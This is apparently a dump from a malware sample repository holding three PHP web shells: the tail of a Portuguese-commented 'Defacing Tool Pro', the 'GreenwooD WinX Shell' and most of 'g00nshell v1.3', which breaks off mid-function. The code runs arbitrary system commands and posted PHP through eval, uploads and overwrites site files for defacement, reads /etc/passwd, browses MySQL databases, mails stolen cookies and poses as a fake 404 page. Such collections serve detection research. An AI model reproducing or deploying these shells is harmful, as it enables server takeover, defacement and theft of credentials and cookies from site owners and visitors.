//contrario, a form nao eh enviada. mas nao keremos que a form seja enviada, keremos simplismente
//que seja definido o cmd que o usuario escolheu na url do browser. por isso, essa funcao sempre retorna
//false
function enviaCMD(){
inclVar();//chama a funcao para definir a variavel de include
window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+window.document.c.comando.value;
return false;//isso aqui evita que o form seja enviado.
}
//essa funcao eh para alterar o metodo (a funcao do php) que serah usado para enviar o cmd para o sistema
//ela estah colocada no evento OnSelect do pulldown de metodos ('using ...') do dtool.
//esta aqui o grande diferencial do dtool. ele utiliza pode utilizar varias funcoes do php para enviar o comando
//para o sistema, enquanto a grande maioria das cmds (todas que eu jah vi) utilizam apenas 3: passthru(), system() e
//exec(), e ainda assim, nao trabalham de forma correta com o exec().
//Na maior parte das vezes, o servidor nao esta realmente em Safemode, pois (para admins amadores :P) isso causaria
//mto problema de compatibilidade nos scripts dos clientes que hospedam a pagina. Por isso, esses admins teem o costume
//de simplismente desativar o passthru, o system e o exec, "tornando o servidor muito mais seguro".
function ativaFe(qual){
inclVar();//chama a funcao para definir a variavel de include
window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+window.document.c.comando.value;
return false;//isso aqui evita que o form seja enviado.
}
//PHPget
//funcao que abre prompts perguntando para o usuario informacoes que o phpget precisa para fazer o
//download do arquivo.
function PHPget(){
inclVar();//chama a funcao para definir a variavel de include
var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://www.colegioparthenon.com.br/dirativo/bd/nc.gif");
var dir = c.substring(0,c.lastIndexOf('/')+1);//descobre qual eh o diretorio
var file = c.substring(dir.length,c.length+1);//descobre o nome do arquivo.
var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);
window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);
}
//PHPwriter
//funcao que abre prompts perguntando para o usuario informacoes que o phpwriter precisa para escrever
//a index no servidor.
function PHPwriter(){
inclVar();//chama a funcao para definir a variavel de include
var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://www.geocities.com/revensite/index.htm");
var dir = url.substring(0,url.lastIndexOf('/')+1);//descobre qual eh o diretorio
var file = url.substring(dir.length,url.length+1);//descobre o nome do arquivo.
var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);
t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P");
window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);
}
//Resumo
//funcao que abre uma janela contendo informacoes importantes para o usuario
//guardar num arquivo, possivelmente, nas proximas versoes, essa funcao deixara de existir.
function resumir() {
inclVar();//chama a funcao para definir a variavel de include
resumo='<DIV STYLE="font-family: verdana; font-size: 11px;"><b> <?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?></b><br><?php
$uname = posix_uname();
while (list($info, $value) = each ($uname)) { ?><b><?= $info ?>:</b> <?= $value ?><br><?php } ?><b>default user:</b> uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)<br><b>ip: </b> <?=$ip;?><br><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?><br><b>pro info: </b><?=$pro;?><br><b>path da pagina: </b><?= getcwd() ?><br><b>path writable:</b><? if(@is_writable(getcwd())){ echo " <b>YES</b>"; }else{ echo " no"; } ?>'
jan=open("","jan","width=580,height=300,menubar=yes,scrollbars=yes,resizable=yes,");
jan.document.write(resumo);jan.document.write("<p> <? echo str_repeat("==", 35)?></p>");
jan.document.title="Resumo do servidor";jan.focus();
}
//PHPfilEditor
//funcao que abre um prompt perguntando para o usuario o nome do arquivo que serah aberto
//com o phpfileditor
function PHPf(){
inclVar();//chama a funcao para definir a variavel de include
var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php");
var dir = o.substring(0,o.lastIndexOf('/')+1);//descobre kual eh o diretorio
var file = o.substring(dir.length,o.length+1);//descobre o nome do arquivo.
window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);
}
//SafeMode
//abre o dtool no modo em safemode
function safeMode(){
inclVar();//chama a funcao para definir a variavel de include
if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){
window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'&'<?=$showdir;?>;
}else{ return false }
}
//FileListing
//lista os arquivos em modo texto, com links clicaveis para acesso de diretorio e edicao de arquivos
function list(turn){
inclVar();//chama a funcao para definir a variavel de include
if(turn=="off")turn=0;
else if(turn=="on")turn=1;
window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+window.document.c.comando.value;
return false;
}
//Overwrite Files
//ativa o script para substituir arquivos com uma dada palavra chave.
function overwrite(){
inclVar();//chama a funcao para definir a variavel de include
if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){
keyw=prompt("Digite a palavra chave",".jpg");
newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");
if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){
trydel=1
}else{trydel=0}
if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){
window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;
}
}
}
</script>
<table width="690" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ] <a href="javascript:window.open('<?=$remote_addr;?>help.txt');">?</a><br>
<font size=2>by r3v3ng4ns - revengans@hotmail.com </font>
</b></div></td></tr>
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = @posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
<? if($chdir!=getcwd()){?>
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
</DIV></TD></TR></TABLE></td></tr>
<tr><td><form name="c" id="c" method="post" action="#" onSubmit="return enviaCMD()">
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
<td width="75"><DIV class="algod">command</DIV></td>
<td width="300"><input name="comando" type="text" id="comando" value='<?=$cmdshow;?>' style="width:295; font-size:12px" class="campo">
</td></tr></table><table><tr><td>
<?php
if(isset($chdir)) @chdir($chdir);//aqui muda o diretorio que o script trabalha para o definido em $chdir
ob_start();
//As funcoes abaixo trabalham de forma correta com o output das funcoes de php usadas,
//o que normalmente as cmds nao fazem...
function safemode($what){//como ultimo recurso, mostra que o srv estah em safemode
//'outputeia' uma msg de erro, supondo q o srv esteja em safemode
echo "It seems that this server is using php in safemode. Try to use DTool in Safemode.";
}
function popenn($what){//envia o cmd para o sistema usando popen()
$handle=popen("$what", "r");//o popen funciona semelhante ao fopen
$out=@fread($handle, 2096);//coloca numa variavel o retorno
echo $out;//'outputeia' o retorno
@pclose($handle);
}
function execc($what){//envia o cmd para o sistema usando exec()
exec("$what",$array_out);//o exec() recebe o retorno em arrays.
$out=@implode("\n",$array_out);//aqui junta as arrays
echo $out;//aqui 'outputeia' o retorno
}
function shell($what){//envia o cmd para o sistema usado shell_exec() (tb conhecido como `backtik operator`)
echo(shell_exec($what));//'outputeia' o retorno
}
$funE="function_exists";//para encurtar o nome abaixo... :P
//testa quais funcoes existem, para detectar automaticamente qual metodo
//sera usado para enviar a funcao para o sistema
if($funE('passthru')){$fe="passthru";$feshow=$fe;}
elseif($funE('system')){$fe="system";$feshow=$fe;}
elseif($funE('exec')){$fe="execc";$feshow="exec";}
elseif($funE('popen')){$fe="popenn";$feshow="popen";}
elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
else {$fe="safemode";$feshow=$fe;}
//se o usuario tiver definido qual metodo serah usado para enviar o cmd
//para o sistema, aki ele eh reconhecido/definido.
if($fu!="" or !empty($fu)){
if($fu==1){$fe="passthru";$feshow=$fe;}
if($fu==2){$fe="system";$feshow=$fe;}
if($fu==3){$fe="execc";$feshow="exec";}
if($fu==4){$fe="popenn";$feshow="popen";}
if($fu==5){$fe="shell";$feshow="shell_exec";}
}
//executa o comando usando o metodo escolhido pelo usuario, e
//faz com que a saida de erro apareca na tela ( com o '2>&1')
$fe("$cmd 2>&1");
$output=ob_get_contents();ob_end_clean();
?>
<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualf" class="campo" style="background-color:#313654" onchange="ativaFe(c.qualf.value);">
<option><?="using $feshow()";?>
<option value="1">use passthru()
<option value="2">use system()
<option value="3">use exec()
<option value="4">use popen()
<option value="5">use shell_exec()
<option value="0">auto detect (default)
</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="resBtn" value="resumo" class="campo" onClick="resumir()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
</tr></table></td></tr></table></form></td></tr>
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdshow</i>\", using <i>$feshow()</i>";?></i></DIV>
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
<?php
echo $ch_msg;
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir &lt;diretorio&gt;; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Resumo\nfale com o r3v3ng4ns :P");
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?></TEXTAREA><BR></td></tr>
<?php
if($list=="1") include($remote_addr."flist.txt");
?>
</table>

103
PHP/Backdoor.PHP.WebShell.u Normal file
View File

@ -0,0 +1,103 @@
<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>
<body bgcolor="#FFFFFF" text="#000000" link="#0066FF" vlink="#0066FF" alink="#0066FF">
<?php
// -----:[ Start infomation ]:-----
// It's simple shell for all Win OS.
// Created by greenwood from n57
//
// ------:[ End infomation]:-------
set_magic_quotes_runtime(0);
//*Variables*
//-------------------------------
$veros = `ver`;
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$windir = `echo %windir%`;
//------------------------------
if( $cmd == "" ) {
$cmd = 'dir /OG /X';
}
//-------------------------------
//------------------------------
print "<table style=\"font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9px; border: 1px #000000 dotted\" border=\"0\" cellspacing=\"1\" cellpadding=\"2\" >";
print "<tr>";
print "<td><font color=\"#990000\">You:</font></td>" ;
print "<td> ".$_SERVER['REMOTE_ADDR']." [<font color=\"#0033CC\">".$host."</font>] </td>" ;
print "</tr>";
print "<tr>";
print "<td><font color=\"red\">Version OS:</font></td>" ;
print "<td><font color=\"#0066CC\"> $veros </font></td>";
print "</tr>";
print "<tr>";
print "<td><font color=\"#990000\">Server:</font></td>";
print "<td><font color=\"#0066CC\">".$_SERVER['SERVER_SIGNATURE']."</font></td>";
print "</tr>";
print "<tr>";
print "<td><font color=\"#990000\">Win Dir:</font></td>";
print "<td><font color=\"#0066CC\"> $windir </font></td>";
print "</tr>";
print "</table>";
print "<br>";
//------- [netstat -an] and [ipconfig] and [tasklist] ------------
print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"netstat -an\">";
print "&nbsp;&nbsp;&nbsp;";
print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"ipconfig\">";
print "&nbsp;&nbsp;&nbsp;";
print "<input style=\"font-family: Verdana; font-size: 12px; width:10%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"cmd\" value=\"tasklist\">";
print "</form>";
//-------------------------------
//-------------------------------
print "<textarea style=\"width:100%; height:50% ;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" readonly>";
system($cmd);
print "</textarea>";
print "<br>";
//-------------------------------
print "<form name=\"cmd_send\" method=\"post\" action=\"$PHP_SELF\">";
print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">CMD: </font>";
print "<br>";
print "<input style=\"font-family: Verdana; font-size: 12px; width:50%;border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"text\" name=\"cmd\" value=\"$cmd\">";
print " <input style = \"font-family: Verdana; font-size: 12px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" name=\"_run\" value=\"Run\">";
print "</form>";
//-------------------------------
print "<form enctype=\"multipart/form-data\" action=\"$PHP_SELF\" method=\"post\">";
print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">Upload:</font>";
print "<br>";
print "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">";
print "<font face=\"Verdana\" size=\"1\" color=\"#990000\">File: </font><input style=\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"userfile\" type=\"file\">";
print " <font face=\"Verdana\" size=\"1\" color=\"#990000\">Filename on server: </font> <input style=\"font-family: Verdana; font-size: 9px;background-color: #FFFFFF; border: #000000; border-style: dotted; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" name=\"serverfile\" type=\"text\">";
print" <input style =\"font-family: Verdana; font-size: 9px; background-color: #FFFFFF; border: #666666; border-style: solid; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px\" type=\"submit\" value=\"Send\">";
print"</form>";
?>
<?
// Script for uploading
if (is_uploaded_file($userfile)) {
move_uploaded_file($userfile, $serverfile);
}
?>
<center><font face="Verdana" size="1" color="#000000">Created by -:[GreenwooD]:- </font></center>
</body></html>

730
PHP/Backdoor.PHP.WebShell.w Normal file
View File

@ -0,0 +1,730 @@
<?php
/*
######################################################################
# [g00n]FiSh presents: #
# g00nshell v1.3 final #
############################DOCUMENTATION#############################
#To execute commands, simply include ?cmd=___ in the url. #
#Ex: http://site.com/shl.php?cmd=whoami #
# #
#To steal cookies, use ?cookie=___ in the url. #
#Ex: <script>document.location.href= #
#'http://site.com/shl.php?cookie='+document.cookies</script> #
##########################VERIFICATION LEVELS#########################
#0: No protection; anyone can access #
#1: User-Agent required #
#2: Require IP #
#3: Basic Authentication #
##############################KNOWN BUGS##############################
#Windows directory handling #
# #
#The SQL tool is NOT complete. There is currently no editing function#
#available. Some time in the future this may be fixed, but for now #
#don't complain to me about it #
################################SHOUTS################################
#pr0be - Beta testing & CSS #
#TrinTiTTY - Beta testing #
#clorox - Beta testing #
#Everyone else at g00ns.net #
########################NOTE TO ADMINISTRATORS########################
#If this script has been found on your server without your approval, #
#it would probably be wise to delete it and check your logs. #
######################################################################
*/
// Configuration
$auth = 0;
$uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent
$IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell
$email = ""; // E-mail address where cookies will be sent
$user = "af1035a85447f5aa9d21570d884b723a"; // MD5 encoded User
$pass = "47e331d2b8d07465515c50cb0fad1e5a"; // MD5 encoded Password
// Global Variables
$version = "1.3 final";
$self = $_SERVER['PHP_SELF'];
$soft = $_SERVER["SERVER_SOFTWARE"];
$servinf = split("[:]", getenv('HTTP_HOST'));
$servip = $servinf[0];
$servport = $servinf[1];
$uname = php_uname();
$curuser = @exec('whoami');
$cmd = $_GET['cmd'];
$act = $_GET['act'];
$cmd = $_GET['cmd'];
$cookie = $_GET['cookie'];
$f = $_GET['f'];
$curdir = cleandir(getcwd());
if(!$dir){$dir = $_GET['dir'];}
elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
elseif($dir && $_SESSION['dir']){$dir = $curdir;}
if($dir && $dir != "nullz"){$dir = cleandir($dir);}
$contents = $_POST['contents'];
$gf = $_POST['gf'];
$img = $_GET['img'];
session_start();
@set_time_limit(5);
switch($auth){ // Authentication switcher
case 0: break;
case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();} break;
case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break;
}
function userauth(){ // Basic authentication function
global $user, $pass;
header("WWW-Authenticate: Basic realm='Secure Area'");
if(md5($_SERVER["PHP_AUTH_USER"]) != $user || md5($_SERVER["PHP_AUTH_PW"] != $pass)){
hide();
die();
}
}
if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
elseif(!$act && $cmd){
style();
echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>");
$cmd = exec($cmd, $result);
foreach($result as $line){echo($line . "\n");}
echo("</textarea>");
}
elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email"); hide();} // Cookie stealer function
elseif($act == "view" && $f && $dir){view($f, $dir);}
elseif($img){img($img);}
elseif($gf){grab($gf);}
elseif($dir){files($dir);}
else{
switch($act){
case "phpinfo": phpinfo();break;
case "sql": sql();break;
case "files": files($dir);break;
case "email": email();break;
case "cmd": cmd();break;
case "upload": upload();break;
case "tools": tools();break;
case "sqllogin": sqllogin();break;
case "sql": sql();break;
case "lookup": lookup();break;
case "kill": kill();break;
case "phpexec": execphp();break;
default: main();break;
}
}
function cleandir($d){ // Function to clean up the $dir and $curdir variables
$d = realpath($d);
$d = str_replace("\\\\", "//", $d);
$d = str_replace("////", "//", $d);
$d = str_replace("\\", "/", $d);
return($d);
}
function hide(){ // Hiding function
global $self, $soft, $servip, $servport;
die("<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL $self was not found on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.
<HR>
<ADDRESS>$soft Server at $servip Port $servport</ADDRESS>
</BODY></HTML>");
}
function style(){ // Style / header function
global $servip,$version;
echo("<html>\n
<head>\n
<title>g00nshell v" . $version . " - " . $servip . "</title>\n
<style>\n
body { background-color:#000000; color:white; font-family:Verdana; font-size:11px; }\n
h1 { color:white; font-family:Verdana; font-size:11px; }\n
h3 { color:white; font-family:Verdana; font-size:11px; }\n
input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }\n
textarea { font-family:Courier; font-size:11px; }\n
a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-size:11px; }\n
a:hover { color:#7F7F7F; }\n
td,th { font-size:12px; vertical-align:middle; }\n
th { font-size:13px; }\n
table { empty-cells:show;}\n
.inf { color:#7F7F7F; }\n
</style>\n
</head>\n");
}
function main(){ // Main/menu function
global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
style();
$act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute',
'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
$capt = array_flip($act);
echo("<form method='GET' name='shell'>");
echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
echo("<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>");
echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
echo("<div style='display:none' id='info'>");
echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
echo("<b>ID:</b> <span class='inf'>" . @exec('id') . "</span><br>");
if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font color='red'>ON</font>");}
else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
echo("\n<br>\n");
if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
echo("\n<br>\n");
if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " . @ini_get('disable_functions'));}
else{echo("<b>Disabled functions:</b> None");}
echo("\n<br>\n");
if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font color='green'>ON</font>");}
else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
echo("</div>");
echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'block';\">More</a> ] ");
echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display = 'none';\">Less</a> ]");
echo("<center>");
echo("<h3 align='center'>Links</h3>");
if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
else{foreach($act as $link){echo("[ <a href='?act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
echo("</center>");
echo("<hr>");
echo("<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?act=files'></iframe>");
echo("<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version . "</font> ::</pre>");
die();
}
function cmd(){ // Command execution function
style();
echo("<form name='CMD' method='POST'>");
echo("<b>Command:</b><br>");
echo("<input name='cmd' type='text' size='50'> ");
echo("<select name='precmd'>");
$precmd = array(''=>'','Read /etc/passwd'=>'cat /etc/passwd','Open ports'=>'netstat -an',
'Running Processes'=>'ps -aux', 'Uname'=>'uname -a', 'Get UID'=>'id',
'Create Junkfile (/tmp/z)'=>'dd if=/dev/zero of=/tmp/z bs=1M count=1024',
'Find passwd files'=>'find / -type f -name passwd');
$capt = array_flip($precmd);
foreach($precmd as $c){echo("<option value='" . $c . "'>" . $capt[$c] . "\n");}
echo("</select><br>\n");
echo("<input type='submit' value='Execute'>\n");
echo("</form>\n");
if($_POST['cmd'] != ""){$x = $_POST['cmd'];}
elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
else{die();}
echo("Results: <br><textarea rows=20 cols=100>");
$cmd = @exec($x, $result);
foreach($result as $line){echo($line . "\n");}
echo("</textarea>");
}
function execphp(){ // PHP code execution function
style();
echo("<h4>Execute PHP Code</h4>");
echo("<form method='POST'>");
echo("<textarea name='phpexec' rows=5 cols=100>");
if(!$_POST['phpexec']){echo("/*Don't include <? ?> tags*/\n");}
echo(htmlentities($_POST['phpexec']) . "</textarea>\n<br>\n");
echo("<input type='submit' value='Execute'>");
echo("</form>");
if($_POST['phpexec']){
echo("<textarea rows=10 cols=100>");
eval(stripslashes($_POST['phpexec']));
echo("</textarea>");
}
}
function sqllogin(){ // MySQL login function
session_start();
if($_SESSION['isloggedin'] == "true"){
header("Location: ?act=sql");
}
style();
echo("<form method='post' action='?act=sql'>");
echo("User:<br><input type='text' name='un' size='30'><br>\n");
echo("Password:<br><input type='text' name='pw' size='30'><br>\n");
echo("Host:<br><input type='text' name='host' size='30' value='localhost'><br>\n");
echo("Port:<br><input type='text' name='port' size='30' value='3306'><br>\n");
echo("<input type='submit' value='Login'>");
echo("</form>");
die();
}
function sql(){ // General SQL Function
session_start();
if(!$_GET['sqlf']){style();}
if($_POST['un'] && $_POST['pw']){;
$_SESSION['sql_user'] = $_POST['un'];
$_SESSION['sql_password'] = $_POST['pw'];
}
if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
else{$_SESSION['sql_host'] = 'localhost';}
if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
else{$_SESSION['sql_port'] = '3306';}
if($_SESSION['sql_user'] && $_SESSION['sql_password']){
if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
echo("Invalid credentials<br>\n");
die(sqllogin());
}
else{
$_SESSION['isloggedin'] = "true";
}
}
else{
die(sqllogin());
}
if ($_GET['db']){
mysql_select_db($_GET['db'], $sqlcon);
if($_GET['sqlquery']){
$dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
$num = mysql_num_rows($dat);
for($i=0;$i<$num;$i++){
echo(mysql_result($dat, $i) . "<br>\n");
}
}
else if($_GET['table'] && !$_GET['sqlf']){
echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&sqlf=ins'>Insert Row</a><br><br>\n");
echo("<table border='1'>");
$query = "SHOW COLUMNS FROM " . $_GET['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$i = 0;
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['Field']);
echo("<th>" . $fields[$i]);
$i++;
}
$result = mysql_query("Select * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
$num_rows = mysql_num_rows($result) or die(mysql_error());
$y=0;
for($x=1;$x<=$num_rows+1;$x++){
if(!$_GET['p']){
$_GET['p'] = 1;
}
if($_GET['p']){
if($y > (30*($_GET['p']-1)) && $y <= 30*($_GET['p'])){
echo("<tr>");
for($i=0;$i<count($fields);$i++){
$query = "Select " . $fields[$i] . " FROM " . $_GET['table'] . " Where " . $fields[0] . " = '" . $x . "'";
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while($row = mysql_fetch_row($dat)){
echo("<td>" . $row[0] . "</td>");
}
}
echo("</tr>\n");
}
}
$y++;
}
echo("</table>\n");
for($z=1;$z<=ceil($num_rows / 30);$z++){
echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $z . "'>" . $z . "</a> | ");
}
}
elseif($_GET['table'] && $_GET['sqlf']){
switch($_GET['sqlf']){
case "dl": sqldownload();break;
case "ins": sqlinsert();break;
default: $_GET['sqlf'] = "";
}
}
else{
echo("<table>");
$query = "SHOW TABLES FROM " . $_GET['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat)){
